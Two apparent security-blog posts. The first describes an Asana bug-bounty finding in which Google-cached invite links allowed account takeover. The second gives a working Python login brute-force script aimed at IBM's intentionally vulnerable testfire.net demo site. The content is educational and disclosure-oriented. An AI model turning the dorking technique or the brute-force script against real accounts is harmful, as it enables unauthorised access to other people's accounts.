Hijack User accounts via cached Invite links! #Asana #bugbounty

A few weeks back a friend of mine mentioned to me about Asana's bug bounty program. Although I did not see any mention of reward money in their security page I still thought of giving it a try. After reading a little about the company I found that www.asana.com is a portal where a team can share the resources and organize its work i.e. kind of a project management software.

I created an account and started poking around and checked for obvious vulnerabilities such as XSS and CSRF. The application appeared to be decent but there was always some scope for a few logical vulnerabilities.

The application allowed creation of new projects followed by addition of new users by sending them invite links.

These invite links looked like these (https://app.asana.com/app/asana/-/register?invite=XXXXXX), so I thought of trying my luck with these links.

By using a few Google dorks I was able to get a list of invite links which were cached by Google and to my surprise they were still active. 

 So I collected a list of cached invite links and tried creating an account and voila!! it worked smoothly as I expected. I was able to login into a valid user account by creating a new password. 

I reported this issue to asana security team and they were very quick in responding to my emails. The issue got fixed within no time and they rewarded me for the same.

My lazy attempt towards python! #BeautifulSoup #Requests

Inspired by the amazing null humla session that I attended I thought of writing my own simple login-brute-force in python using requests. There are a lot of brute-forcing scripts in the market but I thought of writing my own.

I love the Requests library for python, as the author says "Its HTTP for Humans" it actually is. I really encourage using this library at least once if one wants to start learning python web scraping.

I have also used BeautifulSoup library to extract few HTML tags. The website which I have used is http://www.testfire.net, which is a vulnerable bank application developed by IBM for web app testing.

The script is used to brute force all possible passwords against a single user name "admin". I initially tried writing it with cookiejar but some how the code got little lengthier but then Requests came to my rescue.

The script opens a file called 'password.txt' containing a list of random passwords to brute force. In this case the correct password is "admin", with Requests library it is possible to intercept the request in a proxy before hitting the server. Here I am running a proxy on port 8082 just to see the data what my script is sending.Feel free to use the script (for learning purpose only), here is the gist link.

#Author: Prajal Kulkarni

import requests
import sys
from bs4 import BeautifulSoup as BS

proxyDict = {"http":"127.0.0.1:8082"}

url = "http://www.testfire.net/bank/login.aspx"

def connect(url,m):
    t = requests.post("http://www.testfire.net/bank/login.aspx", data=m, proxies=proxyDict)
    print t.text
    soup = BS(t.text)
    a=soup.find('a', id="_ctl0__ctl0_Content_AccountLink")
    x = str(a.string)
    print x
    if x == "MY ACCOUNT" :
        print "The pass is" + " " + m['passw']
        sys.exit()
    else:
        print "Password %s not working" %m['passw']

def controller():
    m = {}
    f=open('password.txt','r').read().split('\n')
    for line in f:
          m["uid"] = "admin"
          m["passw"] = str(line)
          m["btnSubmit"] = "Login"
          print m
          connect(url,m)

controller()